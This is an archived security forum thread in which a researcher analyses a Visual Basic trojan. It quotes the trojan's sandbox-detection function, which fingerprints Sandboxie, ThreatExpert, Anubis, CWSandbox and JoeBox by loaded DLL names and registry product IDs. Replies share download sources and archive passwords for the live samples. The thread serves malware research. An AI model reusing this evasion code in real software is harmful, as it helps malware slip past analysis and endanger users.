Log in

View Full Version : Trojan.Win32.VB.jir - Automated Analysis tools Aware


evilcry
January 27th, 2009, 03:52
Hi,
Joe from JoeBox signaled me the attached malware, that is Trojan.Win32.VB.jir, is written in VB6 and presents some basilar checks
on Online Automated Malware Analysis Tools like:

Code:

Sandboxie
Threat Expert
Anubis
CWSandbox
JoeBox
VM:
VMware Workstation
VirtualPC
VirtualBox


Here the Sandbox Detect Function:

Code:

Public Function IsInSandbox() As Boolean
Dim hKey As Long, hOpen As Long, hQuery As Long, hSnapShot As Long
Dim me32 As MODULEENTRY32
Dim szBuffer As String * 128

hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId)

me32.dwSize = Len(me32)
Module32First hSnapShot, me32

Do While Module32Next(hSnapShot, me32) <> 0
If InStr(1, LCase(me32.szModule), "sbiedll.dll" > 0 Then 'Sandboxie
IsInSandbox = True
ElseIf InStr(1, LCase(me32.szModule), "dbghelp.dll" > 0 Then 'ThreatExpert
IsInSandbox = True
End If
Loop

CloseHandle (hSnapShot)

If IsInSandbox = False Then
hOpen = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion", 0, KEY_ALL_ACCESS, hKey)
If hOpen = 0 Then
hQuery = RegQueryValueEx(hKey, "ProductId", 0, REG_SZ, szBuffer, 128)
If hQuery = 0 Then
If InStr(1, szBuffer, "76487-337-8429955-22614" > 0 Then 'Anubis
IsInSandbox = True
ElseIf InStr(1, szBuffer, "76487-644-3177037-23510" > 0 Then 'CWSandbox
IsInSandbox = True
ElseIf InStr(1, szBuffer, "55274-640-2673064-23950" > 0 Then 'JoeBox
IsInSandbox = True
End If
End If
End If
RegCloseKey (hKey)
End If
End Function


Malware Zip Password: infected

Regards,
Giuseppe 'Evilcry' Bonfa'

evaluator
January 27th, 2009, 10:37
seem same is in this torrent.

password: MALWARE

coder_gate
July 22nd, 2009, 09:29
thank you....

nEINEI
September 18th, 2009, 22:56
MALWARE.rar (24.5 KB)
psw is error ?

Kayaker
September 19th, 2009, 00:10
You mean password? No, the password MALWARE works.